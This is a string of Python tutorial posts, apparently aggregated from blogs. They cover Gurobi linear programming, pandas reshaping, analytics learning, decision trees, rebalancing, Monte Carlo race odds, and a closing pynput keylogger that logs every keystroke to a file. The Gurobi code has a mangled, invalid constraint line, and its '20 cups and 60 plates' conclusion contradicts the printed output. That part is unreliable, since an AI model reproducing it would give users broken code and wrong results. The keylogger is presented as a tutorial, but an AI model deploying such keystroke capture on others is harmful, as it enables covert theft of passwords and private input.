In this article we will discuss how to solve linear programming problems with Gurobipy in Python.
Table of Contents
Linear programming (LP) is a tool to solve optimization problems. It is widely used to solve optimization problems in many industries.
In this tutorial we will be working with gurobipy library, which is a Gurobi Python interface. Gurobi is one of the most powerful and fastest optimization solvers and the company constantly releases new features. You can learn more about their licenses here.
To continue following this tutorial we will need the following Python library: gurobipy.
If you don’t have it installed, please open “Command Prompt” (on Windows) and install it using the following code:
python -m pip install -i https://pypi.gurobi.com gurobipy
Note: gurobipy includes a limited license to get started with the library and solve some sample optimization problems. If you are planning on solving more complex problems, you will need to get a license.
Linear programming is much easier to understand once we have an example of such an optimization problem.
Consider a manufacturing company which produces two items: cups and plates. Here is what we know:
The company’s goal is to maximize profits (revenue – cost).
Below are the steps we need to solve this linear programming problem:
In any linear programming problem we need to correctly identify the decision variables. What are they? Decision variables are variables that represent a decision made in the problem.
In our case, a company needs to decide how many cups and plates it will produce (the decision). So we define our decision variables as:
$$ x_1 = \textit{# of cups to produce} $$
$$ x_2 = \textit{# of plates to produce} $$
In any optimization problem we want to either maximize or minimize something. In our case, the company wants to maximize profits, therefore our objective function will be a profit maximization.
Recall that our selling price for each cup is $27 and selling price for each plate is $21. We can write the revenue function as:
$$ \textit{Revenue} = 27x_1 + 21x_2 $$
The next part is to define our cost function. We have two parts to it: raw materials and labour.
Recall that for raw materials it costs $10 per cup and $9 per plate:
$$ \textit{Raw materials} = 10x_1 + 9x_2 $$
And for labour it costs $14 per cup and $10 per plate:
$$ \textit{Labour} = 14x_1 + 10x_2 $$
With the above, we can solve for the profit function as:
$$ \textit{Profit} = (27x_1 + 21x_2 )-(10x_1 + 9x_2)-(14x_1 + 10x_2) = 3x_1 + 2x_2$$
And our objective function becomes:
$$ \textit{max z} = 3x_1 + 2x_2$$
First constraint would be the labour hours. We know that each cup takes 2 labour hours and each plate takes 1 labour hour. There is also a maximum of 100 labour hours available:
$$ \textit{Constraint 1: } 2.2x_1 + x_2 \leq 100$$
Second constraint would be the demand for plates. We know that the demand for cups is unlimited, but demand for plates is 30 units:
$$ \textit{Constraint 2: } x_2 \leq 30$$
The last two constraints are the sign restrictions for decision variables. In our case, number of both cups and plates produced should be greater or equal to zero:
$$ \textit{Constraint 3: } x_1 \geq 0 $$
$$ \textit{Constraint 4: }x_2 \geq 0 $$
Now we have the optimization problem formulated, we will need to solve it using gurobipy in Python.
We begin with importing the library:
from gurobipy import *
Next, we create a new empty model:
m = Model()
Now we can add the \(x_1\) and \(x_2\) variables to the model:
x1 = m.addVar(name="x1") x2 = m.addVar(name="x2")
Note: we are adding variables without any specifications, allowing the optimal \(x_1\) and \(x_2\) be any continuous value.
Following the similar steps from the previous part, we add the objective function we created and set it as a maximization problem:
m.setObjective(3*x1 + 2*x2 , GRB.MAXIMIZE)
And add the constraints:
m.addConstr(2.2*x1 + x2 = 0, "c5")
Finally, run the optimization:
m.optimize()
At this point our linear programming optimization is solved, and we can work on retrieving the results.
We begin with getting the optimal values for \(x_1\) and \(x_2\):
for v in m.getVars(): print(v.varName, v.x)
And we get:
x1 31.818181 x2 30.0
To maximize profit, the company should produce 20 cups and 60 plates. What is the maximized profit?
We can get it from the optimized model:
print('Maximized profit:', m.objVal)
And we get:
Maximized profit: 155.454545
In summary, the maximum profit a company can make is $155.45 while producing 31.82 cups and 30 plates.
from gurobipy import * # Create a new model m = Model() # Create variables x1 = m.addVar(name="x1") x2 = m.addVar(name="x2") # Set objective function m.setObjective(3*x1 + 2*x2 , GRB.MAXIMIZE) #Add constraints m.addConstr(2.2*x1 + x2 = 0, "c5") # Optimize model m.optimize() #Print values for decision variables for v in m.getVars(): print(v.varName, v.x) #Print maximized profit value print('Maximized profit:', m.objVal)
In reality, can the company produce 31.82 cups? Not really. What we need is some way of generating integers for the \(x_1\) and \(x_2\) decision variables.
Check out my article on how to solve integer programming problems with Python.
In this article we covered how you can solve a linear programming problem using Gurobi Python interface with gurobipy library.
Feel free to leave comments below if you have any questions or have suggestions for some edits and check out more of my Optimization articles.
The post Linear Programming with Gurobipy in Python appeared first on PyShark.
In this series of posts, we will show you the basics of Pandas Dataframes which is one of the most useful Data Science python libraries ever made. The first post of this series is about reshaping data.
df = pd.DataFrame( {"A" : ['a' ,'a', 'a', 'b', 'b' ,'b'], "B" : ['A' ,'B', 'C', 'A', 'B' ,'C'], "C" : [4, 5, 6 , 7 ,8 ,9]}) df
A B C 0 a A 4 1 a B 5 2 a C 6 3 b A 7 4 b B 8 5 b C 9
df.pivot(columns='B',values='C',index='A')
B A B C A a 4 5 6 b 7 8 9
df=pd.DataFrame({'A': [4, 7], 'B': [5, 8], 'C': [6, 9]}) df
A B C 0 4 5 6 1 7 8 9
df.melt()
variable value 0 A 4 1 A 7 2 B 5 3 B 8 4 C 6 5 C 9
df1 = pd.DataFrame( {"A" : [1 ,2, 3], "B" : [4, 5, 6], "C" : [7, 8, 9]}) df2 = pd.DataFrame( {"A" : [10 ,11], "B" : [12, 13], "C" : [14, 15]}) print(df1) print(df2)
A B C 0 1 4 7 1 2 5 8 2 3 6 9 A B C 0 10 12 14 1 11 13 15
pd.concat([df1,df2])
A B C 0 1 4 7 1 2 5 8 2 3 6 9 0 10 12 14 1 11 13 15
df=pd.DataFrame({'A':[[1,2,3],[4,5,6]]})
A 0 [1, 2, 3] 1 [4, 5, 6]
df.explode('A')
A 0 1 0 2 0 3 1 4 1 5 1 6
df = pd.DataFrame([[0, 1], [2, 3]], index=['A', 'B'], columns=['COL1', 'COL2']) df
COL1 COL2 A 0 1 B 2 3
df.stack()
A COL1 0 COL2 1 B COL1 2 COL2 3
index = pd.MultiIndex.from_tuples([('A', 'col1'), ('A', 'col2'), ('B', 'col1'), ('B', 'col2')]) df = pd.Series(np.arange(1.0, 5.0), index=index) df
A col1 1.0 col2 2.0 B col1 3.0 col2 4.0
df.unstack()
col1 col2 A 1.0 2.0 B 3.0 4.0
When many hear “data analytics” these days, they think of graphical user interface (GUI)-driven business intelligence (e.g. Tableau), data warehousing (e.g. Snowflake), or data preparation (e.g. Alteryx) platforms. These tools have their place (some more than others) in the analytics stack.
But rather than focus on these tools in my book Advancing into Analytics, I teach readers the two major data programming languages, R and Python. These are often considered data science tools. Many successful analysts don’t know them and don’t see the need. But I believe data analysts have great reason to learn how to code. Here’s why:
If I had a dime for every time I mentioned that analysts spend 50 to 80 percent of their time preparing data, I might not need to write a blog.
So, how do we lighten that load? Traditionally, Excel wonks have made great use of keyboard shortcuts to speed up their workflow. UX research does indeed indicate that using the keyboard shows more productivity gains than using a mouse. Let’s extrapolate that to understand that coding is generally more productive than pointing-and-clicking. Of course, it takes longer to learn the former. So this becomes a break-even decision of code versus GUI.
For the early stages of a project, or one-off needs, a GUI could be fine. But there’s something to be said for “codifying” a project such that it can be automated. In a job with this much grunt work, it’s a learning investment that pays off.
Maybe future technologies can use NLP or augmented reality to provide other options than coding versus GUI. I’m pretty impressed, for example, with the AI-embedded tools of Power BI: start typing what kind of chart you want, and it’ll make its best guess. More stuff like this, and maybe the productivity gains of code versus GUI aren’t so clear. But for now, the calculus is still favorable to learning how to code.
Now, the choice between code and GUI isn’t always so clear-cut. In fact, VBA and now Power Query offer some menu-driven tools to generate syntax. Some business intelligence tools are offering the same for machine learning, usually powered by R or Python behind the scenes.
I don’t know about you, but I nearly always have some requirement that can only be accomplished by coding in these frameworks. Every data project is different — have you ever struggled to search-engine the answer of some task you’re looking to do? GUIs tend to limit your options with the tradeoff that there’s a lower barrier to entry. This isn’t always a tradeoff that rank-and-file analysts can make.
Maybe you can think of code as the engine powering your GUI under the hood. You are a long-haul analyst and need to be able to pop the hood and make the necessary adjustments when the GUI just can’t seem to ignite the fuse. Some coding knowledge is important, even if you’re working with tools that generate it for you.
Origin stories matter, and it’s no different for software. Many low- and no-code tools are proprietary. They may be easier to use and harder to break, but someone’s dropping a lot of money for that convenience and support.
On the other hand, many data programming languages are open source. This means that anyone is free to build on, distribute, or contribute to the software. In other words: open source is great freedom and great responsibility. Closed versus open source offer opposing worldviews, and it’s important to follow the implications of either.
Every analyst should have some direct exposure to open source due to the major impacts it’s had on technology and data in the last decade. What are the pros and cons of open source? What is a package? What is a pull request? Analysts should be able to answer these. They can do it through direct experience in the open source world, by learning R and Python.
I see too many data analysts totally commit to the offerings of one proprietary vendor. This tends to induce myopia in what an analyst knows about (They may start to think their vendor invented the left outer join, which has been around for decades). Committing to one closed source vendor leaves so much off the table in today’s analytics landscape.
Hey, if Microsoft is playing nice with open source, then maybe you should too.
The idea of reproducibility in data is that given the same inputs and processes, the same outputs should result time and again.
Now, a lot of people have piled onto Excel because it’s not always reproducible. It’s easy not to know if someone deleted a column or where exactly originally someone got the data to make a graph from, before they started chopping it off into worksheets. (Power Query busts many of these Excel myths, but let’s overlook that for now.)
The solution to this downside is often to adopt some kind of expensive business intelligence tool. The irony is that while BI tools have their benefits, reproducibility isn’t necessarily one of them: they, like Excel are GUI-driven, and it can be hard to track back to the original inputs.
Programming languages like R and Python offer a universe of tools for reproducible research. If, for example, you need to conduct some statistical analysis of a dataset and report your results, I couldn’t imagine doing this anymore without coding. “Show your work” is some solid advice from grade school, and code is a great way to do that in analytics.
Yes, learning to code is a knowledge investment; it is learning a new language, after all. But like learning any language, coding will open new doors for data analysts.
If you want the least friction to open these doors, I suggest you check out my book, Advancing into Analytics: From Excel to Python and R. You may not associate these as data analytics tools, but for the reasons explained above, I find them indispensable for the data analysts.
Technical books are curious in a lot of ways, including this one: most technical authors don’t typically teach or write for a living. They’re technicians who happen to write a book. That means that while you may get the most brilliant technical know-how, you may not receive it in a format best suited to understand and retain it. Lots of technical books feel like a battle of wits against the author, and readers quickly lose what tenuous grasp was offered of the material.
Now, I’m by no means a trained instructional designer or learning theorist, and like many academic pursuits I think that the fluff/nugget ratio is pretty high in these fields. But I have spent enough time adjacent to them that I’ve been able to identify those nuggets and incorporate useful learning theories into Advancing into Analytics.
What this means in theory (pun intended) is that Advancing into Analytics is written for you to learn and retain the most knowledge possible, without having to work too hard at it.
Here are some of the topics and techniques I used to do that. I especially rely on Make it Stick: The Science of Successful Learning by Peter C. Brown et al. and Powerful Teaching: Unleash the Science of Learning by Pooja K. Agarwal and Patrica M. Bain for making it happen.
Learning happens by relating new knowledge to existing knowledge. Transfer learning is the practice of explicitly making this connection part of the learning.
I’ve said it before and I’ll say it again: Excel kicks off a great learning path to more advanced analytics. Spreadsheet users know from experience the main operations and tasks of data cleaning and analysis. Technical elites too often sneer at spreadsheets, and attempt to write their audience’s knowledge about data to zero, so they can start from a “purer” approach. Talk about negative yardage!
In my book, I instead directly relate Excel knowledge to broader analytics equivalents:
VLOOKUP()
tell us about database joins?Have you ever read and re-read a book, thinking you’ve nailed the content, only to find that you can’t remember any of it when tested? Maybe you even used a highlighter and sticky notes, but to no avail.
The issue with learning this way is that it focuses purely on the consumption of material and not its implementation. To really master a subject, you need to actively apply it to new material. As Pooja K. Agarwal and Patricia M. Bain write in Powerful Teaching: “One of the best ways to make sure something sticks and get stored is to focus on the retrieval stage, not the encoding stage.”
Now, I’ll admit that I tend to skip end-of-chapter book exercises. They’re usually dull (literal) textbook exercises, and it can be hard to find the solutions anyway. Why not just continue reading and keep the book’s momentum going? I’ve noticed that many technical authors don’t even include book exercises, likely for these reasons (and because, let’s be honest, exercises take more work).
I provide exercises for nearly all chapters of Advancing into Analytics, using real-life datasets to practice data exploration and hypothesis testing in Excel, Python and R. What’s more all exercise solutions are conveniently available in the book’s public GitHub repository. If you read the book, please do these exercises. It’s how you’ll remember the content.
As my business’s name might attest, I am a (mostly erstwhile) musician. Of the many lessons learned from music is the power of interleaving.
It’s tempting to practice a piece from start to end each time, but that’s not so effective. The problem is that gaps may form in the music covered (i.e., you may only practice the beginning of a piece, or your favorite or easiest parts). You can easily fall into a slump when you know what order to expect each time you practice.
A better approach is to mix it up. Pick a random part of a piece and start playing and re-playing. Try sections out-of-order or even backwards. Add some variety to the way in which you practice.
Learning often follows a blocked approach, where one topic is studied very thoroughly before moving onto the next, often in the same order. By contrast, interleaving mixes topics in a spaced, often varying, order.
Advancing into Analytics is arranged into three sections: first, the statistical foundations of analytics are demonstrated in Excel. The reader then learns analytics in R and later Python.
Rather than treat these topics as three disconnected parts, I interleave related concepts among them. For example, readers will recreate the same analysis of a dataset using all three applications. Statistical and data cleaning know-how is introduced and re-introduced in different contexts, so that we’ll conceptualize a data table in Excel, then build it in R and Python.
Now, if you’re thinking that this is how knowledge usually works in reality anyway… well, you’re probably right. Learning tends to be iterative and incremental, and there’s no clean break between mastering one topic and getting started in another. Traditional education isn’t always modeled this way, but Advancing into Analytics is. It’s just not possible to master hypothesis testing, for example, in a single chapter, so you’ll see the topic appear in different contexts throughout the book.
Getting into analytics isn’t easy. In many cases, it literally requires learning a new language (of the programming variety). You’ve got enough on your plate: a battle of wits with a technically gifted but pedagogically unaware author shouldn’t be there.
In Advancing into Analytics, you’ll learn not one but two programming languages. Not only that, you’ll discover hypothesis testing, data wrangling, even a smidge of what could be called machine learning, all in 250 pages. This is possible with the help of learning theory. I hope the book can serve as the straightest path to analytics out there.
Decision trees are one of the most intuitive machine learning algorithms used both for classification and regression. After reading, you’ll know how to implement a decision tree classifier entirely from scratch.
This is the fifth of many upcoming from-scratch articles, so stay tuned to the blog if you want to learn more. The links to the previous articles are located at the end of this piece.
The article is structured as follows:
You can download the corresponding notebook here.
Decision trees are a non-parametric model used for both regression and classification tasks. The from-scratch implementation will take you some time to fully understand, but the intuition behind the algorithm is quite simple.
Decision trees are constructed from only two elements – nodes and branches. We’ll discuss different types of nodes in a bit. If you decide to follow along, the term recursion shouldn’t feel like a foreign language, as the algorithm is based on this concept. You’ll get a crash course in recursion in a couple of minutes, so don’t sweat it if you’re a bit rusty on the topic.
Let’s take a look at an example decision tree first:
As you can see, there are multiple types of nodes:
Depending on the dataset size (both in rows and columns), there are probably thousands to millions of ways the nodes and their conditions can be arranged. So, how do we determine the root node?
In a nutshell, we need to check how every input feature classifies the target variable independently. If none of the features alone is 100% correct in the classification, we can consider these features impure.
To further decide which of the impure features is most pure, we can use the Entropy metric. We’ll discuss the formula and the calculations later, but you should remember that the entropy value ranges from 0 (best) to 1 (worst).
The variable with the lowest entropy is then used as a root node.
To begin training the decision tree classifier, we have to determine the root node. That part has already been discussed.
Then, for every single split, the Information gain metric is calculated. Put simply, it represents an average of all entropy values based on a specific split. We’ll discuss the formula and calculations later, but please remember that the higher the gain is, the better the decision split is.
The algorithm then performs a greedy search – goes over all input features and their unique values, calculates information gain for every combination, and saves the best split feature and threshold for every node.
In this way, the tree is built recursively. The recursion process could go on forever, so we’ll have to specify some exit conditions manually. The most common ones are maximum depth and minimum samples at the node. Both will be discussed later upon implementation.
Once the tree is built, we can make predictions for unseen data by recursively traversing the tree. We can check for the traversal direction (left or right) based on the input data and learned thresholds at each node.
Once the leaf node is reached, the most common value is returned.
And that’s it for the basic theory and intuition behind decision trees. Let’s talk about the math behind the algorithm in the next section.
Decision trees represent much more of a coding challenge than a mathematical one. You’ll only have to implement two formulas for the learning part – entropy and information gain.
Let’s start with entropy. As mentioned earlier, it measures a purity of a split at a node level. Its value ranges from 0 (pure) and 1 (impure).
Here’s the formula for entropy:
As you can see, it’s a relatively simple equation, so let’s see it in action. Imagine you want to calculate the purity of the following vector:
To summarize, zeros and ones are the class labels with the following counts:
The entropy calculation is as simple as it can be from this point (rounded to five decimal points):
The result of 0.88 indicates the split is nowhere near pure. Let’s repeat the calculation in Python next. The following code implements the entropy(s)
formula and calculates it on the same vector:
The results are shown in the following image:
As you can see, the results are identical, indicating the formula was implemented correctly.
Let’s take a look at the information gain next. It represents an average of all entropy values based on a specific split. The higher the information gain value, the better the decision split is.
Information gain can be calculated with the following formula:
Let’s take a look at an example split and calculate the information gain:
As you can see, the entropy values were calculated beforehand, so we don’t have to waste time on them. Calculating information gain is now a trivial process:
Let’s implement it in Python next. The following code snippet implements the information_gain()
function and calculates it for the previously discussed split:
The results are shown in the following image:
As you can see, the values match.
And that’s all there is to the math behind decision trees. I’ll repeat – this algorithm is much more challenging to implement in code than to understand mathematically. That’s why you’ll need an additional primer on recursion – coming up next.
A lot of implementation regarding decision trees boils down to recursion. This section will provide a sneak peek at recursive functions and isn’t by any means a go-to guide to the topic. If this term is new to you, please research it if you want to understand decision trees.
Put simply, a recursive function is a function that calls itself. We don’t want this process going on indefinitely, so the function will need an exit condition. You’ll find it written at the top of the function.
Let’s take a look at the simplest example possible – a recursive function that returns a factorial of an integer:
The results are shown in the following image:
As you can see, the function calls itself until the entered number isn’t 1. That’s the exit condition of our function.
Recursion is needed in decision tree classifiers to build additional nodes until some exit condition is met. That’s why it’s crucial to understand this concept.
Up next, we’ll implement the classifier. It will require around 200 lines of code (minus the docstrings and comments), so embrace yourself.
We’ll need two classes:
Node
– implements a single node of a decision treeDecisionTree
– implements the algorithmLet’s start with the Node
class. It is here to store the data about the feature, threshold, data going left and right, information gain, and the leaf node value. All are initially set to None
. The root and decision nodes will contain values for everything besides the leaf node value, and the leaf node will contain the opposite.
Here’s the code for the class:
That was the easy part. Let’s implement the classifier next. It will contain a bunch of methods, all of which are discussed below:
__init__()
– the constructor, holds values for min_samples_split
and max_depth
. These are hyperparameters. The first one is used to specify a minimum number of samples required to split a node, and the second one specifies a maximum depth of a tree. Both are used in recursive functions as exit conditions_entropy(s)
– calculates the impurity of an input vector s
_information_gain(parent, left_child, right_child)
calculates the information gain value of a split between a parent and two children_best_split(X, y)
function calculates the best splitting parameters for input features X
and a target variable y
. It does so by iterating over every column in X
and every threshold value in every column to find the optimal split using information gain_build(X, y, depth)
function recursively builds a decision tree until stopping criteria is met (hyperparameters in the constructor)fit(X, y)
function calls the _build()
function and stores the built tree to the constructor_predict(x)
function traverses the tree to classify a single instancepredict(X)
function applies the _predict()
function to every instance in matrix X
.It’s a lot – no arguing there. Take your time to understand every line from the code snippet below. It is well-documented, so the comments should help a bit:
You’re not expected to understand every line of code in one sitting. Give it time, go over the code line by line and try to reason why things work. It’s not that difficult once you understand the basic intuition behind the algorithm.
Let’s test our classifier next. We’ll use the Iris dataset from Scikit-Learn. The following code snippet loads the dataset and separates it into features (X
) and the target (y
):
Let’s split the dataset into training and testing portions next. The following code snippet does just that, in an 80:20 ratio:
And now let’s do the training. The code snippet below trains the model with default hyperparameters and makes predictions on the test set:
Let’s take a look at the generated predictions (preds
):
And now at the actual class labels (y_test
):
As you can see, both are identical, indicating a perfectly accurate classifier. You can further evaluate the performance if you want. The code below prints the accuracy score on the test set:
As expected, the value of 1.0
would get printed. Don’t let this fool you – the Iris dataset is incredibly easy to classify correctly, especially if you get a good “random” test set. Still, let’s compare our classifier to the one built into Scikit-Learn.
We want to know if our model is any good, so let’s compare it with something we know works well — a DecisionTreeClassifier
class from Scikit-Learn.
You can use the following snippet to import the model class, train the model, make predictions, and print the accuracy score:
As you would expect, we get a perfect accuracy score of 1.0
.
And that’s all for today. Let’s wrap things up in the next section.
This was one of the most challenging articles I have ever written. It took around a week to get everything right and to make the code as understandable as possible. Naturally, it will take you at least a couple of readings to understand the topic altogether. Feel free to explore additional resources, as it will further advance your understanding.
You now know how to implement the Decision tree classifier algorithm from scratch. Does that mean you should ditch the de facto standard machine learning libraries? No, not at all. Let me elaborate.
Just because you can write something from scratch doesn’t mean you should. Still, knowing every detail of how algorithms work is a valuable skill and can help you stand out from every other fit and predict data scientist.
Thanks for reading, and please stay tuned to the blog if you’re interested in more machine learning from scratch articles.
The post Master Machine Learning: Decision Trees From Scratch With Python appeared first on Better Data Science.
Sometimes when we are working on machine learning projects, there are some factors that can have a huge impact on the performance and they are not manageable or structured. A solution is to remove their effect in our data by sampling based on the factor we want to normalize.
Let’s create the data for our Data:
let’s suppose that we have a factor called Campaigns with the following groups:
import pandas as pd import numpy as np import statsmodels.formula.api as smf import plotly.express as px Smartphone = pd.DataFrame( { "Gender": np.random.choice(["m", "f"], 200, p=[0.6, 0.4]), "Age": np.random.choice(["[<30]", "[30-65]", "[65 ]"], 200, p=[0.3, 0.6, 0.1]), "Add_Color": np.random.choice(["Blue", "Red"], 200, p=[0.6, 0.4]), "Campaign": ["Smartphone"] * 200, "Click": np.random.binomial(1, size=200, p=0.6), } ) Camera = pd.DataFrame( { "Gender": np.random.choice(["m", "f"], 200, p=[0.6, 0.4]), "Age": np.random.choice(["[<30]", "[30-65]", "[65 ]"], 200, p=[0.3, 0.6, 0.1]), "Add_Color": np.random.choice(["Blue", "Red"], 200, p=[0.3, 0.7]), "Campaign": ["Camera"] * 200, "Click": np.random.binomial(1, size=200, p=0.2), } ) Computer = pd.DataFrame( { "Gender": np.random.choice(["m", "f"], 200, p=[0.6, 0.4]), "Age": np.random.choice(["[<30]", "[30-65]", "[65 ]"], 200, p=[0.3, 0.6, 0.1]), "Add_Color": np.random.choice(["Blue", "Red"], 200, p=[0.25, 0.75]), "Campaign": ["Computer"] * 200, "Click": np.random.binomial(1, size=200, p=0.25), } ) df=pd.concat([Smartphone,Camera,Computer]) df.sample(10)
Gender Age Add_Color Campaign Click 115 m [<30] Red Smartphone 1 12 m [30-65] Red Computer 0 112 m [30-65] Red Computer 0 148 m [<30] Red Computer 1 127 m [<30] Blue Computer 0 83 f [<30] Red Smartphone 1 168 f [30-65] Red Computer 0 80 f [30-65] Red Computer 0 25 m [<30] Red Camera 0 11 f [30-65] Red Smartphone 0
Below we can see that every group has a different click rate. That would be ok if we wanted to use this feature in our model. However, if we can’t use it (maybe because in the future we may have different campaigns and we want a universal model), we have to somehow remove this effect otherwise we will have a biased model.
print(df.groupby('Campaign').mean())
Click Campaign Camera 0.21 Computer 0.22 Smartphone 0.59
What we want to achieve is to resample every group to result to an eqaul Click Rate.
In our example, we are working with clicks. So, we have two classes, 0 and 1. What we want to achieve is to have an equal amount of each for every campaign so the click rate will be 0.5. We will use the Pandas function sample. Basically, what it does is given a data-frame and a number, it gets an equal amount of random rows with this number with no replacement.
The tricky part here is that we have to define the Minority and the Majority class for every campaign because as we can see, the minority class for the Smartphone campaign is class 0 and the minority for Computer and Camera is 1.
#get the unique campaigns campaigns=df.Campaign.unique() sampled=pd.DataFrame() for i in campaigns: print(i) #keep the campaign we want to sample z=df.query(f'Campaign=="{i}"') A=z[z['Click']==0][['Click']] B=z[z['Click']==1][['Click']] #find out which is the Minority and Majority if len(A)>len(B): majority=A minority=B else: majority=B minority=A #Sampling indexes=majority.sample(len(minority),random_state=7).index #what we did here is to get the indexes that are NOT in the sampling above #so we can remove them in the following steps from our dataframe z indexes=majority.loc[~majority.index.isin(indexes)].index z=z.loc[~z.index.isin(indexes)] sampled=pd.concat([sampled,z]) sampled.groupby('Campaign').mean()
Click Campaign Camera 0.5 Computer 0.5 Smartphone 0.5
We lost some of our data but we are resulting in more meaningful data to use for our model. This is not an exclusive method to deal with this kind of problem but a simple solution that we are using. Biased data is one of the most common problems in Machine Learning and can lead to major problems so this is a nice tool to add to your toolset.
There are many different approaches to predict the winner of a race. The race can be any distance and the runners can be dogs, horses and humans. Also, apart from trying to predict the winner, it may be possible to answer other questions like the probability of a runner being on the podium (top three positions) and so on.
Personally, in this kind of problems, I prefer to approach them with Monte Carlo simulation instead of trying to build Machine Learning models. Let ‘s describe the Monte Carlo approach.
Let’s say that we want to predict the probability of each runner winning a race of 100 meters. For our model we want to get the past racing times of the runners during the last period of time, let’s say last 1 to 2 years provided that we have a sufficient number of races. Then we need to calculate the mean and the standard deviation of each runner. Notice that it makes sense to use an exponential moving average for the mean and maybe for standard deviation so that to give more weight to the most recent observations. Also, a good technique is to remove the worst time of each racer.
You can easily get the exponential moving average with pandas. Let’s show how we can do that. Assume that our data frame has the NAME of the runner and the TIME order by DATE. Our logic is to get the rolling EWM and then to keep the last for each runner
import pandas as pd import numpy as np # convert it to data df['DATE'] = pd.to_datetime(df.DATE) # sort by date df.sort_values('DATE', inplace=True) df['mean_tmp']=df.groupby('NAME')['TIME'].transform(lambda x: x.ewm(alpha=0.30).mean()) df['std_tmp']=df.groupby('NAME')['TIME'].transform(lambda x: x.ewm(alpha=0.30).std()) # remove the NAN in Std df.dropna(subset=['std_tmp'], inplace=True) # get the most recent observation of the EWM runners= df.groupby('NAME')[['mean_tmp', 'std_tmp']].last() runners.reset_index(inplace=True) runners.columns = ['NAME', 'mean', 'std'] runners
Assume that we come up with the following mean and standard deviation for the 8 runners.
runner = pd.DataFrame({'NAME':["A","B","C","D","E","F","G","H"], 'mean': [13.11, 13.17, 12.99, 12.96, 13.25, 13.00, 13.40, 13.29], 'std': [0.15, 0.15, 0.17, 0.20, 0.14, 0.16, 0.17, 0.2]})
Let’s get the probability of each runner to win by running a Monte Carlo Simulation by approximating the normal distribution with the corresponding parameters.
# number of simulations np.random.seed(5) # number of simulations sims = 1000 runner['monte_carlo'] = runner.apply(lambda x:np.random.normal(x['mean'], x['std'], sims), axis=1)
Once we simulated the data, we can get the probability of each runner to win.
# Probability to finish in top x positions top_x = 1 tmp_probs = pd.DataFrame((pd.DataFrame(list(runner['monte_carlo']),index=runner.NAME).rank()<=top_x).sum(axis=1)/sims) tmp_probs.reset_index(inplace=True) tmp_probs.columns=['NAME', 'Probability']
As we can see, the runner D was 34.8% probability to win and he is the favorite!
Similarly, we can estimate the probability of each runner to be on the podium, i.e. in the top 3 positions.
# Probability to finish in top x positions top_x = 3 # in top three positions tmp_probs = pd.DataFrame((pd.DataFrame(list(runner['monte_carlo']),index=runner.NAME).rank()<=top_x).sum(axis=1)/sims) tmp_probs.reset_index(inplace=True) tmp_probs.columns=['NAME', 'Probability']
In this article we will discuss how to make a simple keylogger using Python.
Table of Contents
Keyloggers are a type of monitoring software used to record keystrokes made by the user with their keyboard.
They are often used for monitoring the network usage as well as troubleshoot the technical problems. On the other hand, a lot of malicious software uses keyloggers to attempt to get usernames and passwords for different websites.
To continue following this tutorial we will need the following Python library: pynput.
If you don’t have it installed, please open “Command Prompt” (on Windows) and install it using the following code:
pip install pynput
The first thing we will discuss is how to control the keyboard using Python and specifically how to press keys on the keyboard.
There are two types of keys that we should consider:
To begin controlling the keyboard, we need to create an instance of Controller() class which will have the .press() and .release() methods. This class send the keyboard events to our system.
You can think of these methods exactly as they are described, and it is how we type, we press and release each key on the keyboard.
Here is a simple example:
from pynput.keyboard import Controller keyboard = Controller() keyboard.press('a') keyboard.release('a')
Note that this code will type “a” wherever your mouse cursor is located. It is also designed to press and release one key at a time.
Of course you can press and release multiple keys:
from pynput.keyboard import Controller keyboard = Controller() keyboard.press('a') keyboard.release('a') keyboard.press('b') keyboard.release('b')
Now you will see that the output is “ab”.
Now, how do we handle special keys? What if I want to press “a b” (a, space, b)?
A complete list of all special keys is available here. Special keys are called using the Key class from the pynput module.
Here is an example:
from pynput.keyboard import Key, Controller keyboard = Controller() keyboard.press('a') keyboard.release('a') keyboard.press(Key.space) keyboard.release(Key.space) keyboard.press('b') keyboard.release('b')
And the output is “a b”.
This option works for special keys that we press and release, such as space, enter, and so on. But how about the keys that we keep pressed while typing? Such as shift? And our goal is to press “Ab” (capital a, b).
There needs to be some convenient way of using it. And there is! There is a very useful .pressed() method of the Controller() class that we can use:
from pynput.keyboard import Key, Controller keyboard = Controller() with keyboard.pressed(Key.shift): keyboard.press('a') keyboard.release('a') keyboard.press('b') keyboard.release('b')
And the output is “Ab”.
You can practice with different combinations of keys, and depending on what you need the code can differ a little, but this is a general overview of how the press and release logic works for controlling the keyboard.
We would like our keylogger to record the keys that we press and store them in a simple text file.
Let’s first create this sample file and then integrate it into the key logging process:
with open("log.txt", "w") as logfile: logfile.write("This is our log file")
Running the above code will create a log.txt file which will have This is our log file written in it. In our case, we would like Python to record the keys that we press and add them to this file.
We already know how to create the log.txt file with some sample text. Now, what we want to do is have Python write the keys we press into this file (rather than having the sample text there).
So let’s first think conceptually what we want to happen? Well what we need is some list that will keep appending keys that we pressed on keyboard right? And then, once a key is pressed it will write this list to a file.
Let’s see how we can do it:
#Import required modules from pynput.keyboard import Key #Create an empty list to store pressed keys keys = [] #Create a function that defines what to do on each key press def on_each_key_press(key): #Append each pressed key to a list keys.append(key) #Write list to file after each key pressed write_keys_to_file(keys)
Okay, so conceptually the above function works, but we still need to define our write_keys_to_file() function.
Keep in mind, that so far each key pressed comes in the “key” format, and in order for us to write it to a file, we should have it as a String. In addition, we will need to remove ‘quotation’ marks from each key, since each key is a string and we want to join them together.
def write_keys_to_file(keys): #Create the log.txt file with write mode with open('log.txt', 'w') as logfile: #Loop through each key in the list of keys for key in keys: #Convert key to String and remove quotation marks key = str(key).replace("'", "") #Write each key to the log.txt file logfile.write(key)
Okay, now on each key press Python will create a log.txt file with the list of keys pressed since the time the script started running up to the last key pressed.
If we leave the code as is, it will keep running all the time. What we want to do is to define some stop key or a combination of keys that will stop the key logger. Let’s say, our stop key is “Esc”. How would we do it?
We already know that if we press “Esc”, it will be added to log.txt, so what we can do is define an operation that will take place once we release the “Esc” key after pressing it:
#Create a function that defines what to do on each key release def on_each_key_release(key): #If the key is Esc then stop the keylogger if key == Key.esc: return False
As the last step we will need to assemble everything together and get the keylogger running.
To run our keylogger we will need some sort of listening instance that will record keyboard events. To do this we will use the Listener() class from the pynput module.
This class has a few parameters, but we will need only two of them:
As you can follow from our steps, we can use our defined on_each_key_press() and on_each_key_release() functions as parameters for the Listener() class so we can join each key press to each other:
with Listener( on_press = on_each_press, on_release = on_each_key_release ) as listener: listener.join()
Now we have all the components and let’s look at the complete code how to create a simple keylogger using Python.
